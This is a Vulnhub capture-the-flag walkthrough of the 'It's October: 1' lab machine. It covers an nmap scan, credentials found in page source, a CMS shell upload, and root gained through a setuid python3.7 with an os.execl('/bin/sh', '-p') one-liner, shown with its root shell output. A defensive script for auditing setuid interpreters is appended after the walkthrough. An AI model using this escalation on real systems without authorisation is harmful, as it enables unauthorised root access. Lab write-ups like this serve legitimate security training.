IT’S OCTOBER: 1 | Vulnhub Walkthrough

This is another easy-level machine from Vulnhub.

Goal: Get the root flag of the target.

Difficulty: Easy/Medium Level

Lab Setup:-

Now let's find the IP of the machine.

Here is my machine's IP: 192.168.1.205

Scanning:-

┌──(danial㉿kali)-[~/Desktop/InfosecWarrior/Its_October]
└─$ nmap -sV -sC -v -A -oA nmap -p- 192.168.1.205

Got 4 open ports: 22, 80, 3306 and 8080.

Let’s move forward with port 80

Nothing special: got a simple HTML template. After running dirb and gobuster, found only an admin directory.

Leave it for now and move forward with port 8080.

Got a custom page. After reviewing the source code, got some creds.

Now let’s log in to the CMS.

Now time to upload a shell.

After spending 2–3 hours, got a method to upload a shell. Tried the plugin method also, but it did not work.

Now we got a shell

After running the find command, got something that attracted my attention.

So I decided to move forward with python3.7.

So finally got a method to root the machine.

bash-5.0$ /usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
/usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

Finally got root!!
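
The id output above (uid=33 but euid=0) means /usr/bin/python3.7 carries the setuid bit with root as owner, which is what the find step turned up. The following is an added example, not part of the original walkthrough: a small audit that walks a directory tree and flags setuid/setgid files whose names look like interpreters or shells. The watch-list and the sample tree are assumptions constructed for the demonstration.

```python
import os
import stat
import tempfile

# Assumed watch-list (not from the walkthrough): interpreters and shells that
# should never carry a setuid/setgid bit, because they run arbitrary code.
RISKY_NAMES = {"python", "perl", "ruby", "php", "node", "lua", "bash", "dash", "sh", "zsh"}


def audit_setid(root):
    """Return sorted (path, mode string, owner uid, risky) for every set-id regular file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # file vanished or unreadable
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            # "python3.7" -> "python": drop the version suffix before the lookup
            risky = name.rstrip("0123456789.-") in RISKY_NAMES
            findings.append((path, stat.filemode(st.st_mode), st.st_uid, risky))
    return sorted(findings)


def demo():
    """Constructed sample tree: a setuid interpreter, a setuid non-interpreter, a plain file."""
    with tempfile.TemporaryDirectory() as root:
        for name, mode in (("python3.7", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write("placeholder\n")
            os.chmod(path, mode)  # set the mode after writing; writes clear setuid
        return [(os.path.basename(p), m, risky) for p, m, _uid, risky in audit_setid(root)]


if __name__ == "__main__":
    for name, mode, risky in demo():
        print(mode, name, "REVIEW: interpreter/shell with set-id bit" if risky else "not on watch-list")
```

On a real host, run audit_setid("/usr") as root and remove the bit from any flagged interpreter with chmod u-s.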

Happy Hacking.